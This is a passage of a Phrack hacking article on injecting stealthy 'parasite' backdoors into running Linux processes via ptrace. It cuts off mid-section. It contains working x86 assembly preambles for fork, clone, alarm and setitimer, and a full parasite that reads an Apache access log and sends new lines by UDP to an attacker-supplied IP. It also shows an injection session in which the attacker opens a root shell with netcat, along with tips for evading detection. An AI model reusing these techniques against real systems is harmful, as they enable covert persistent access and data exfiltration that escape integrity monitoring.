Phrack Inc. Volume 14 Issue 68 File 09
==Phrack Inc.==
Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13
|=-----------------------------------------------------------------------=|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|=-----------------------------------------------------------------------=|
Index
------[ 0. Introduction
------[ 1. Brief discussion on injection methods
------[ 2. First generation: fork() and clone()
------[ 3. Second generation: signal()/alarm()
------[ 4. Third generation: setitimer()
------[ 5. Working parasites
------------[ 5.1 Process and thread backdoor
------------[ 5.2 Remote "tail follow" parasite
------------[ 5.3 Single process backdoor
------[ 6. Something about the injector
------[ 7. Further readings
------[ 8. Links and references
------[ 0. Introduction
In biology a parasite is an organism that grows, feeds, and lives in a
different organism while contributing nothing to the survival of its host.
(There is another interesting definition that, even if it's less relevant,
I find funny: a professional dinner guest, especially in ancient Greece.
From Greek parasitos, person who eats at someone else's table,
parasite: para-, beside; sitos, grain, food.)
So, without digressing too much, what do we mean by "parasite" in this
document? A parasite is simply some executable code that lives within
another process, but that was injected after its loading time, by a
third person/program.
Any process can become infected quite easily, using standard libraries
provided by operating systems (we will use process trace, ptrace [0]).
The real difficulty for the parasite is to coexist peacefully with the host
process, without killing it. By "death" of the host we also mean a
situation where, even if the process remains active, it is no longer
able to work properly, because its memory has been corrupted.
The goal of this document is to create a parasite that lives and lets the
host process live, as if nothing had happened.
Starting with simple techniques, and gradually improving the parasite,
we'll reach a point where our creature is scheduled inside the process of
the host, without the need for fork() or similar calls (e.g. clone()).
An interesting question is: why is a parasite an excellent backdoor?
The simplest answer is that a parasite hides what is not permitted in what
is allowed, so that:
- it's difficult to detect using conventional tools
- it's more stable and easy to use than kernel-level rootkits.
If the target system has security tools that automatically monitor the
integrity of executable files, but that do not perform complete audits of
memory, the parasite will not trigger any alarm.
After this introduction we can dive into the problem.
If you prefer practical examples, you can "jump" to section 5,
which shows three different types of real parasites.
------[ 1. Brief discussion on injection methods
To separate the creation of the shellcode from the methods used to inject
it into the host process, this section will discuss how the parasite is
injected (in the examples of this document).
Unlike normal shellcode which, depending on the vulnerability exploited,
cannot contain certain characters (e.g. NULLs), a parasite has
no particular restrictions.
It can contain any character, even NULL bytes, because ptrace [0] allows us
to modify the .text section of a process directly.
The first question that arises regards where to place parasitic code.
This memory location must not be essential to the program, and should not
be invoked by the code after the start (or shortly after the start) of
the host process.
We can use run-time patching, but it's a complicated technique and makes it
difficult to ensure the correct functioning of the process after the
manipulation. It is therefore not suitable for complex parasites.
The author has chosen to inject the code into the memory range of the
libdl.so library, since it is used during the loading stage of programs but
is then usually no longer necessary (more info: [1][2]).
Another reason for this choice is that the memory address of the library,
when loaded into the process, is exported in the /proc filesystem.
You can easily see that by typing:
$ cat /proc/self/maps
...
b7778000-b777a000 rw-p 00139000 fe:00 37071197 /lib/libc-2.7.so
b777a000-b777d000 rw-p b777a000 00:00 0
...
b7782000-b779c000 r-xp 00000000 fe:00 37071145 /lib/ld-2.7.so <---
...
The marked mapping (/lib/ld-2.7.so in this listing) covers the range
b7782000-b779c000 and is executable. Code injected starting at the initial
address of the range is therefore perfectly executable.
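As a minimal sketch of how such a listing can be read programmatically,
the following Python helper extracts the address ranges of the lines that
match a given permission string and path fragment. The function name
find_mappings() and the SAMPLE text are illustrative assumptions (SAMPLE
simply repeats the lines shown above); this is not the code used by the
injector.

```python
def find_mappings(maps_text, name_part, perms):
    """Return (start, end) pairs for matching /proc/<pid>/maps lines."""
    ranges = []
    for line in maps_text.splitlines():
        fields = line.split()
        # A file-backed mapping line has at least six fields:
        # range, perms, offset, device, inode, path.
        if len(fields) < 6 or "-" not in fields[0]:
            continue
        if fields[1] != perms or name_part not in fields[5]:
            continue
        start, end = (int(part, 16) for part in fields[0].split("-"))
        ranges.append((start, end))
    return ranges


# Hypothetical sample input, copied from the listing in the text.
SAMPLE = """\
b7778000-b777a000 rw-p 00139000 fe:00 37071197 /lib/libc-2.7.so
b777a000-b777d000 rw-p b777a000 00:00 0
b7782000-b779c000 r-xp 00000000 fe:00 37071145 /lib/ld-2.7.so
"""

if __name__ == "__main__":
    for start, end in find_mappings(SAMPLE, "/ld-", "r-xp"):
        print(f"{start:08x}-{end:08x} ({end - start} bytes)")
```

The same helper, called with "rw-p" instead of "r-xp", selects writable
mappings rather than executable ones.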
Some considerations about this method: if the infected program uses
dlopen(), dlclose() or dlsym() during its execution, some problems
could arise. The solution is to inject into the same library, but in
unused memory locations.
(From the tests of the author the initial memory locations of the library
are not critical and do not affect the execution of programs.)
There are other problems on Linux systems that use the grsec kernel patch.
With this patch the text segment of the host process is marked
read/execute only and therefore will not be writable with ptrace.
If that's your case, Ryan O'Neill has published a very powerful
algorithm [3] that exploits sysenter instructions (used by the host's code)
to execute a series of system calls (the algorithm is able to
allocate and set the correct permissions on a new memory area without
modifying the text segment of the traced process).
I recommend that everyone read the document, as it is very interesting.
The other premise I want to establish in this section concerns the basic
information the injector (the program that injects the parasite) must
provide to the shellcode to resume the execution of the host program.
Our implementation of the injector gets the current EIP (Instruction
Pointer) of the host process, pushes it on the stack and writes the
address of the parasite (injected into libdl) into EIP.
The parasite, in its initialization part, saves every register it uses.
Then, at the end of its execution, every modified register is restored.
A simple way to do this is to push and pop all the registers with the
instructions PUSHA and POPA.
After that, a simple RET instruction resumes the execution of the host
process, since its saved EIP is on the top of the stack.
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
parasite_skeleton:
# preamble
push %eax # save registers
push %ebx # used by the shellcode
# ...
# shellcode
# ...
# epilogue
pop %ebx # restore modified registers
pop %eax # ...
ret # restore execution of the host
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Another very useful piece of information the injector provides to the
shellcode is the address of a persistent memory location. In the case of
this document, the address is also taken from /proc/pid/maps:
...
b7701000-b771c000 r-xp 00000000 08:03 1261592 /lib/ld-2.11.1.so
b771c000-b771d000 r--p 0001a000 08:03 1261592 /lib/ld-2.11.1.so
b771d000-b771e000 rw-p 0001b000 08:03 1261592 /lib/ld-2.11.1.so <--
...
The range b771d000-b771e000 has read and write permission and it's
suitable for this purpose.
Other techniques exist to dynamically create writable and executable
memory locations, such as the use of mmap() in the host process. But these
techniques are beyond the scope of this article and will not be analyzed
here.
Since the necessary premises have been made, we can discuss the first
generation of our stealth parasite.
------[ 2. First generation: fork() and clone()
The simplest idea to allow the host process to continue its execution
properly and, at the same time, hide the parasite, is the use of the
fork() syscall (or the creation of a new thread, not analyzed here).
Using fork() the process is split in two:
- the parent process (the original one) can continue its normal execution
- the child process, instead, will execute the parasite
An important thing to note is that the child process inherits the parent's
name and a copy of its memory.
This means that if we inject the parasite in the process "server1",
another process "server1" will be created as its child.
Before the injection:
# ps -A
...
...
5478 ? 00:00:00 server1
...
After the injection:
# ps -A
...
...
5478 ? 00:00:00 server1
5479 ? 00:00:00 server1
...
If the host process is carefully chosen, the parasite will be very hard
to detect. Just think of some network services (such as apache2) that
generate a lot of children: a single child process is unlikely to be
detected.
The fork parasite can be implemented as a preamble preceding the real
shellcode:
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
fork_parasite:
push %eax # save %eax value (needed by parent process)
push $2
pop %eax
int $0x80 # fork
test %eax, %eax
jz shellcode # child: jumps to shellcode
pop %eax # parent: restores host process execution
ret
shellcode: # append your shellcode here
# ...
# ...
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
The preamble simply makes a call to fork(), examines the result, and
decides which execution path to take.
With this implementation, any existing shellcode can be turned into a
parasite: it is the responsibility of the injector to concatenate the parts
before inserting them in the host.
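The return-value test at the heart of the preamble is the ordinary fork()
idiom. A minimal Python sketch of the same split is given below; the
function name run_in_child() is hypothetical, and the child does nothing
except exit with a chosen status so that the two paths can be told apart.

```python
import os


def run_in_child(exit_code):
    """Fork once and return (child_pid, child_exit_status) in the parent."""
    pid = os.fork()
    if pid == 0:
        # Child: fork() returned 0. This is the branch that the
        # "jz shellcode" instruction of the preamble takes.
        os._exit(exit_code)
    # Parent: fork() returned the pid of the child. In the preamble this
    # is the path that restores %eax and returns to the host code.
    _, status = os.waitpid(pid, 0)
    return pid, os.WEXITSTATUS(status)


if __name__ == "__main__":
    child_pid, code = run_in_child(7)
    print(f"child {child_pid} exited with status {code}")
```

Unlike this sketch, the preamble never waits for the child: the parent
returns to the host code immediately.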
A very similar technique uses clone() instead of fork(). We can consider
clone() a generalization of the fork() syscall through which it's possible
to create both processes and threads.
The difference is in the options passed to the syscall. A thread is
generated using particular flags:
- CLONE_VM the calling process and the child process run in the same
memory space. Memory writes performed by the calling process
or by the child process are also visible in the other
process.
Any memory mapping or unmapping performed by the child or
the calling process also affects the other process.
- CLONE_SIGHAND the calling process and the child process share the same
table of signal handlers.
- CLONE_THREAD the child is placed in the same thread group as the
calling process.
The CLONE_THREAD flag is the most important: it is what distinguishes what
we call a "process" from what we call a "thread", at least on Linux systems.
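The flags are plain bit masks, so a combination can be checked with a few
lines of arithmetic. The sketch below decodes the value 0x18900, which is
the one the clone() preamble of this section loads into %ebx. The numeric
constants are the ones defined in <linux/sched.h>; the helper name
decode_clone_flags() is an assumption made for the example.

```python
# Flag values as defined in <linux/sched.h>.
CLONE_VM = 0x00000100
CLONE_SIGHAND = 0x00000800
CLONE_PARENT = 0x00008000
CLONE_THREAD = 0x00010000

KNOWN_FLAGS = {
    "CLONE_VM": CLONE_VM,
    "CLONE_SIGHAND": CLONE_SIGHAND,
    "CLONE_PARENT": CLONE_PARENT,
    "CLONE_THREAD": CLONE_THREAD,
}


def decode_clone_flags(value):
    """Return the sorted names of the known flags set in `value`."""
    return sorted(name for name, bit in KNOWN_FLAGS.items() if value & bit)


if __name__ == "__main__":
    combined = CLONE_VM | CLONE_SIGHAND | CLONE_THREAD | CLONE_PARENT
    print(hex(combined), decode_clone_flags(combined))
```

The low byte of the flags word is reserved for the exit signal of the
child; in 0x18900 it is zero.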
Let's see how the clone() preamble is implemented:
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
clone_parasite:
pusha # save registers (needed by parent process)
# call to sys_clone
xorl %eax, %eax
mov $120, %al
movl $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
# CLONE_THREAD|CLONE_PARENT
int $0x80 # clone
test %eax, %eax
jz shellcode # child: jumps to shellcode
popa # parent: restores host process execution
ret
shellcode: # append your shellcode here
# ...
# ...
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
The code is based on the fork() preamble, and its behaviour is very
similar. The difference is in the result.
Before the injection (single threaded process):
# ps -Am
...
...
8360 pts/3 00:00:00 server1
- - 00:00:00 -
...
After the injection (an additional thread is created):
# ps -Am
...
...
8360 pts/3 00:00:00 server1
- - 00:00:00 -
- - 00:00:00 -
...
Generating a thread is certainly stealthier than generating a process.
However, there is a small disadvantage: if the parasite thread alters
state that belongs to the main thread, it can crash the host. Since the
resources are shared, they must be used much more carefully.
We have just seen how to create parasites executed as independent processes
or threads.
However, these types of parasites are not completely invisible. In some
circumstances, and in the case of particular (monitored) processes, the
generation of a child (process or thread) can be problematic or easily
detectable.
Therefore, in the next section, we will discuss a different type of
parasite/preamble, deeply integrated with its host.
------[ 3. Second generation: signal()/alarm()
If we don't like the creation of another process to execute our parasite
we need some kind of time sharing mechanism inside a single process (did
you see the title of this document?)
It's a scheduling problem: when a new process is created, the operating
system takes care of assigning it time and resources necessary to its
execution.
If we don't want to rely on this mechanism, we have to simulate a scheduler
within a single process, to allow a concurrent execution of parasite and
host, using (usually) asynchronous events.
When you think of asynchronous events in a Unix-like system, the first
thing that comes to mind is signals.
If a process registers a handler for a specific signal, when the signal
is sent the operating system stops its normal execution and makes a
(void function) call to the handler.
When the handler returns, the execution of the process is restored.
There are several functions provided by the operating system to generate
signals. In this chapter we'll use alarm().
alarm() arranges for a SIGALRM signal to be delivered to the calling
process when a given number of seconds has passed.
Its main limitation is that you cannot specify time intervals shorter than
one second, but this is not a problem in most cases.
Our parasite/preamble needs to register itself as the handler for the
signal SIGALRM, and renew the timer every time it is executed, so that it
is called at regular intervals.
This creates a kind of scheduler within a single process, and there is no
need to call fork() (or functions that create threads).
Here is our second generation parasite/preamble:
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
# signal/alarm parasite
handler:
pusha
# alarm(timeout)
xorl %eax, %eax
xorl %ebx, %ebx
mov $27, %al
mov $0x1, %bl # 1 second
int $0x80
schedule:
# signal(SIGALRM, handler)
xorl %eax, %eax
xorl %ebx, %ebx
mov $48, %al
mov $14, %bl
jmp schedule_end # load schedule_end address
load_handler:
pop %ecx
subl $0x23, %ecx # adjust %ecx to point handler()
int $0x80
popa
jmp shellcode
schedule_end:
call load_handler
shellcode: # append your shellcode here
# ...
# ...
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Of course the shellcode you append to the preamble must be aware of the
"alternative" scheduling mechanism.
It must be able to split its operations between multiple calls, and must
not take too much time to run a single step (i.e. a single call),
so as not to slow down the host program or overlap with the next handler
call.
In short, to work properly a call to the handler (our parasite) must last
less than the timer interval.
However, alarm() is not the only function able to simulate a scheduler.
In the next chapter we will see a more advanced function, which allows
finer-grained control over the execution of the parasite.
------[ 4. Third generation: setitimer()
We've just arrived at the latest generation of the parasite.
In the first part of the chapter we'll spend some time analyzing the
function setitimer(), on which the code is based.
The definition of the function is:
int setitimer(int which, const struct itimerval *new_value,
              struct itimerval *old_value);
As in the case of alarm(), the function setitimer() provides a mechanism
for a process to interrupt itself in the future using signals.
Unlike alarm(), however, you can specify intervals of a few microseconds
and choose among various types of timers and time domains.
The argument "int which" selects the type of timer and therefore
the signal that will be sent to the process:
ITIMER_REAL 0x00 the most used timer, it decrements in real time, and
delivers SIGALRM upon expiration.
ITIMER_VIRTUAL 0x01 decrements only when the process is executing, and
delivers SIGVTALRM upon expiration.
ITIMER_PROF 0x02 decrements both when the process executes and when the
system is executing on behalf of the process. Coupled
with ITIMER_VIRTUAL, this timer is usually used to
profile the time spent by the application in user and
kernel space. SIGPROF is delivered upon expiration.
We will use ITIMER_REAL because it allows the generation of signals at
regular intervals, and is not influenced by environmental factors such as
the workload of the system.
The argument "const struct itimerval *new_value" points to an itimerval
structure, defined as:
struct itimerval {
    struct timeval it_interval; /* next value */
    struct timeval it_value;    /* current value */
};
struct timeval {
    long tv_sec;  /* seconds */
    long tv_usec; /* microseconds */
};
The second timeval structure, it_value, is the period between the calling
of the function and the first timer interrupt. If zero, the alarm is
disabled.
The first one, it_interval, is the period between successive timer
interrupts. If zero, the alarm will only be sent once.
We'll set both structures to the same time interval.
The last argument, "struct itimerval *old_value", if not NULL, will be set
by the function at the value of the previous timer. We'll not use this
feature.
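The behaviour of the interval timer can be observed from a high-level
language before reading the assembly. The following Python sketch uses the
standard signal module to arm ITIMER_REAL with equal initial and repeat
intervals, counts the SIGALRM deliveries, and then disarms the timer. The
function name count_ticks() and the 20 ms interval are assumptions chosen
for the demonstration; the code must run in the main thread, since Python
only allows signal handlers to be installed there.

```python
import signal
import time


def count_ticks(wanted, interval=0.02):
    """Arm ITIMER_REAL and return how many SIGALRM ticks were observed."""
    ticks = []

    def on_alarm(signum, frame):
        # Called by the interpreter each time the timer expires.
        ticks.append(time.monotonic())

    signal.signal(signal.SIGALRM, on_alarm)
    # First expiry after `interval` seconds, then every `interval` seconds.
    signal.setitimer(signal.ITIMER_REAL, interval, interval)
    try:
        deadline = time.monotonic() + 5.0
        while len(ticks) < wanted and time.monotonic() < deadline:
            signal.pause()  # sleep until the next signal arrives
    finally:
        # A zero value disarms the timer; then restore the default action.
        signal.setitimer(signal.ITIMER_REAL, 0, 0)
        signal.signal(signal.SIGALRM, signal.SIG_DFL)
    return len(ticks)


if __name__ == "__main__":
    print("ticks observed:", count_ticks(3))
```

Because the timer re-arms itself from it_interval, the handler does not
need to renew it on every call, which is the main difference from the
alarm() approach.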
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
# setitimer parasite
setitimer_hdr:
pusha
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx
mov $104, %al
jmp struct_itimerval # load itimerval structure
load_struct:
pop %ecx
int $0x80
popa
jmp handler
struct_itimerval:
call load_struct
# itimerval structure: you can modify the values
# to set your time intervals
.long 0x0 # seconds
.long 0x5000 # microseconds
.long 0x0 # seconds
.long 0x5000 # microseconds
# signal handler, called by the timer
handler:
pusha
# signal(SIGALRM, handler)
xorl %eax, %eax
xorl %ebx, %ebx
mov $48, %al
mov $14, %bl
jmp handler_end # load handler_end address
load_handler:
pop %ecx
subl $0x19, %ecx # adjust %ecx to point handler()
int $0x80
popa
jmp shellcode
handler_end:
call load_handler
shellcode: # append your shellcode here
# ...
# ...
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
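The four .long values in the listing above are the in-memory image of a
struct itimerval on 32-bit x86, where a long is four bytes. As a worked
check, this Python sketch packs the same values with the struct module;
the helper name pack_itimerval() is hypothetical, and the 4-byte
little-endian layout is an assumption that only holds for that platform.

```python
import struct


def pack_itimerval(interval_s, interval_us, value_s, value_us):
    """Pack a 32-bit x86 struct itimerval: it_interval, then it_value."""
    # "<4l" means four little-endian signed 32-bit integers.
    return struct.pack("<4l", interval_s, interval_us, value_s, value_us)


if __name__ == "__main__":
    blob = pack_itimerval(0, 0x5000, 0, 0x5000)
    print(len(blob), "bytes:", blob.hex())
    print("interval in microseconds:", 0x5000)
```

With these values the timer period is 0x5000 = 20480 microseconds, i.e.
about 20.5 milliseconds, for both the first expiry and the repeats.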
This preamble is used like the previous (alarm) one. The only additional
requirement is a fine-tuned timer: a compromise between the frequency of
executions and the stability of the parasite, which must be able to carry
out its operations in less time than one timer cycle.
You can work around this problem by transforming these preambles
(including the preamble that makes use of alarm()) into epilogues, so that
the timer starts counting only after the parasite has finished its
operations.
In fact, we are going to see how this was implemented in the real parasites
presented below.
------[ 5. Working parasites
Here we come to the practical part. Three working parasites will be
presented: one for each technique exposed in the theoretical part of the
document.
To inject the parasites we used the injector cymothoa [4], written by the
same author, which already includes the code presented in this article.
Although shellcode can be injected into processes through various other
techniques, downloading the program is recommended in order to try the
examples while reading.
------------[ 5.1 Process and thread backdoor
Our first real parasite is a backdoor created by applying the fork()
preamble to pre-existing shellcode.
The shellcode used was developed by izik (izik@tty64.org) and is
available on several sites [5]. For this reason it will not be reproduced
here.
The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
port and forks a shell for every connection.
Using it with the help of an injector has several advantages:
- The ability to configure its behavior. In this case the possibility to
choose the port to listen on.
- The possibility of keeping the host alive using one of the
preambles shown earlier.
- Not having to worry about memory locations necessary to the execution
and data storage, since they are automatically provided.
Let's see in practice how this parasite works...
First, on the victim machine, we must identify a suitable host process.
In this example we will use an instance of cat, since it's really easy to
check if it continues its execution after the injection.
root@victim# ps -A | grep cat
1727 pts/6 00:00:00 cat
We need this pid for the injection:
root@victim# cymothoa -p 1727 -s 1 -y 5555
[+] attaching to process 1727
register info:
-----------------------------------------------------------
eax value: 0xfffffe00 ebx value: 0x0
esp value: 0xbf81e1c8 eip value: 0xb78be430
------------------------------------------------------------
[+] new esp: 0xbf81e1c4
[+] payload preamble: fork
[+] injecting code into 0xb78bf000
[+] copy general purpose registers
[+] detaching from 1727
[+] infected!!!
root@victim#
The process is now infected: we should be able to see two cat instances,
the original one and the new one that corresponds to the parasite:
root@victim# ps -A | grep cat
1727 pts/6 00:00:00 cat
1842 pts/6 00:00:00 cat
If, from a different machine, we try to connect to the port 5555, we should
get a shell:
root@attacker# nc -vv victim 5555
Connection to victim 5555 port [tcp/*] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
whoami
root
At the same time, if we write a few lines in the console where the original
cat is running, we should see the usual output:
root@victim# cat
test123
test123
foo
foo
The backdoor functions properly: the two processes are running at the same
time without crashing...
The same backdoor can also be injected in a similar way using the clone()
preamble, and thus running the parasite as a new thread instead of a new
process.
The command is similar: we only disable the fork() preamble and force
clone() instead:
root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
[+] attaching to process 9425
register info:
-----------------------------------------------------------
eax value: 0xfffffe00 ebx value: 0x0
esp value: 0xbfb4beb8 eip value: 0xb78da430
------------------------------------------------------------
[+] new esp: 0xbfb4beb4
[+] payload preamble: thread
[+] injecting code into 0xb78db000
[+] copy general purpose registers
[+] detaching from 9425
[+] infected!!!
If we execute ps without special flags we now see only one process:
root@victim# ps -A | grep cat
9425 pts/3 00:00:00 cat
But with the option -m we see an additional thread:
root@victim# ps -Am
...
9425 pts/3 00:00:00 cat
- - 00:00:00 -
- - 00:00:00 -
...
...
Using netcat on the port 5555 of the victim machine works as expected.
Some notes on the proper use of the fork() and clone() preambles:
- These preambles are compatible with virtually any existing shellcode,
without any modification. They can be used to easily turn code you have
already written into a parasite.
In the case of the clone() preamble the situation is slightly more
delicate, because the parasite thread may interfere with the host
thread. However, widespread shellcodes are usually already careful
about these issues, and should not cause problems.
- It is better to inject the parasite into servers that generate many
child processes. Some of those I tested are apache2, dhclient3 and,
in the case of a desktop system, the processes of the window manager.
It's hard to find a needle in a haystack, and it is difficult to tell
a single parasite from dozens of apache2 processes ;)
------------[ 5.2 Remote "tail follow" parasite
Have you ever used tail with the "-f" (follow) option? This mode is used
to monitor text files, usually logs, to see in real time the new lines
added by other processes.
tail accepts a sleep interval as an option: the waiting time between one
check of the file and the next.
It's therefore natural, when writing a parasite with the same function, to
use a preamble that allows a precise control of time: the setitimer()
preamble.
This is the code of the new parasite. It is more complex than the
previous listings.
After the source there will be a brief explanation of its operations, and
finally an example of its practical use.
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<
#
# Scheduled tail setitimer parasite
#
#
# Preamble
#
setitimer_hdr:
pusha
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx
mov $104, %al
jmp struct_itimerval
load_struct:
pop %ecx
int $0x80
popa
jmp handler
struct_itimerval:
call load_struct
# these values are replaced by the injector:
.long 0x0#53434553 # seconds
.long 0x5343494d # microseconds
.long 0x0#53434553 # seconds
.long 0x5343494d # microseconds
handler:
pusha
# signal(SIGALRM, handler)
xorl %eax, %eax
xorl %ebx, %ebx
mov $48, %al
mov $14, %bl
jmp handler_end
load_handler:
pop %ecx
subl $0x19, %ecx # adjust %ecx to point handler()
int $0x80
popa
jmp shellcode
handler_end:
call load_handler
#
# The shellcode starts here
#
shellcode:
pusha
# check if already initialized
mov $0x4d454d50, %esi # replaced by the injector
# (persistent memory address)
mov (%esi), %eax
cmp $0xdeadbeef, %eax
je open_call # jump if already initialized
# initialize
mov $0xdeadbeef, %eax
mov %eax, (%esi)
add $4, %esi
xorl %eax, %eax
mov %eax, (%esi)
sub $4, %esi
open_call:
# call to sys_open(file_path, O_RDONLY)
xorl %eax, %eax
mov $5, %al
jmp file_path
load_file_path:
pop %ebx
xorl %ecx, %ecx
int $0x80 # %eax = file descriptor
mov %eax, %edi # save file descriptor
check_file_length:
# call to sys_lseek(fd, 0, SEEK_END)
mov %edi, %ebx
xorl %eax, %eax
mov $19, %al
xorl %ecx, %ecx
xorl %edx, %edx
mov $2, %dl
int $0x80 # %eax = end of file offset (eof)
# get old eof, and store new eof
add $4, %esi
mov (%esi), %ebx
mov %eax, (%esi)
# skip the first read
test %ebx, %ebx
jz return_to_main_proc
# check if file is larger
# (current end of file > previous end of file)
cmp %eax, %ebx
je return_to_main_proc # eof not changed:
# return to main process
calc_data_len:
# calculate new data length
# (current eof - last eof)
mov %eax, %esi
sub %ebx, %esi # saved in %esi
set_new_position:
# call to sys_lseek(fd, last_eof, SEEK_SET)
xorl %eax, %eax
mov $19, %al
mov %ebx, %ecx
mov %edi, %ebx
xorl %edx, %edx
int $0x80 # %eax = last end of file offset
read_file_tail:
# allocate buffer
sub %esi, %esp
# call to sys_read(fd, buf, count)
xorl %eax, %eax
mov $3, %al
mov %edi, %ebx
mov %esp, %ecx
mov %esi, %edx
int $0x80 # %eax = bytes read
mov %esp, %ebp # save pointer to buffer
open_socket:
# call to sys_socketcall($0x01 (socket), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $0x01, %bl
jmp socket_args
load_socket_args:
pop %ecx
int $0x80 # %eax = socket descriptor
jmp send_data
socket_args:
call load_socket_args
.long 0x02 # AF_INET
.long 0x02 # SOCK_DGRAM
.long 0x00 # NULL
send_data:
# prepare sys_socketcall (sendto) arguments
jmp struct_sockaddr
load_sockaddr:
pop %ecx
push $0x10 # sizeof(struct_sockaddr)
push %ecx # struct_sockaddr address
xorl %ecx, %ecx
push %ecx # flags
push %edx # buffer len
push %ebp # buffer pointer
push %eax # socket descriptor
# call to sys_socketcall($11 (sendto), *args)
xorl %eax, %eax
mov $102, %al
xorl %ebx, %ebx
mov $11, %bl
mov %esp, %ecx
int $0x80
jmp restore_stack
struct_sockaddr:
call load_sockaddr
.short 0x02 # AF_INET
.short 0x5250 # PORT (replaced by the injector)
.long 0x34565049 # DEST IP (replaced by the injector)
restore_stack:
# restore stack
pop %ebx # socket descriptor
pop %eax # buffer pointer
pop %edx # buffer len
pop %eax # flags
pop %eax # struct_sockaddr address
pop %eax # sizeof(struct_sockaddr)
# deallocate buffer
add %edx, %esp
close_socket:
# call to sys_close(socket)
xorl %eax, %eax
mov $6, %al
int $0x80
return_to_main_proc:
# call to sys_close(fd)
xorl %eax, %eax
mov $6, %al
mov %edi, %ebx
int $0x80
# return
popa
ret
file_path:
call load_file_path
.ascii "/var/log/apache2/access.log"
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
The code is not written in a super-compact way, since space is not
a problem and ease of programming and modification has been preferred.
The code can be summarized in a few steps:
1) Preamble (which we already know).
2) Check to see if it's the first execution. This step makes use of a
persistent memory location, provided by the injector.
3) Open the file and check its length.
4) Compare it with the previous length of the file.
4.1) If unchanged, the parasite returns the execution to the host process.
4.2) If changed, the execution continues.
5) Read the new lines of the file.
6) Send the new lines to the attacker via UDP.
7) Restore the stack.
8) Return the execution to the host process.
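Steps 2 to 5 amount to the usual "remember the old end of file, read only
the difference" logic of tail -f. A minimal Python sketch of that logic
follows; the function name read_new_data() and the dictionary used as
persistent state are assumptions standing in for the persistent memory
location of the listing. As in the assembly, a stored offset of zero is
treated as "first run". Returning nothing when the file has shrunk is an
addition of this sketch, not something the listing handles.

```python
import os


def read_new_data(path, state):
    """Return the bytes appended to `path` since the previous call."""
    with open(path, "rb") as log:
        end = log.seek(0, os.SEEK_END)   # current end-of-file offset
        previous = state.get("eof", 0)   # offset seen on the last call
        state["eof"] = end               # remember it for the next call
        if previous == 0:
            return b""                   # first run: only record the offset
        if end <= previous:
            return b""                   # unchanged (or truncated) file
        log.seek(previous, os.SEEK_SET)
        return log.read(end - previous)


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "access.log")
        with open(path, "wb") as log:
            log.write(b"first\n")
        state = {}
        print(read_new_data(path, state))
        with open(path, "ab") as log:
            log.write(b"second\n")
        print(read_new_data(path, state))
```

Each call opens and closes the file, just as the parasite does on every
timer tick, so no descriptor stays open between two checks.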
The shellcode receives several parameters from the injector: the address
of a persistent memory location, the attacker IP address and port, and the
microsecond interval for the timer.
The injector simply replaces known hexadecimal markers with these
parameters during the injection. You can see where the replacements occur
by looking at the comments in the code.
Now on to the fun part: the practical use of the parasite.
The first thing to do is to prepare the server on the attacker's machine
to receive data. The main directory of the injector contains a simple
UDP server implementation.
You only need to specify an available port:
root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555
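For readers who do not have the bundled program at hand, a receiver of
this kind takes only a few lines. The Python sketch below is an assumed
equivalent, not the udp_server source shipped with the injector; the
function names open_udp_listener() and receive_once() are hypothetical.

```python
import socket


def open_udp_listener(port, host="0.0.0.0"):
    """Create a UDP socket bound to (host, port)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    return sock


def receive_once(sock, max_size=65535):
    """Block until one datagram arrives; return (payload, sender)."""
    return sock.recvfrom(max_size)


if __name__ == "__main__":
    listener = open_udp_listener(5555)
    print("listening on port UDP", listener.getsockname()[1])
    while True:
        payload, sender = receive_once(listener)
        print(sender[0], payload.decode("utf-8", errors="replace"), end="")
```

UDP is connectionless, so the receiver needs no accept() step: every
datagram is delivered as it arrives.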
Now we can move to the victim's machine, and choose a suitable process.
For simplicity we will use cat again.
To inject the parasite we must specify some parameters:
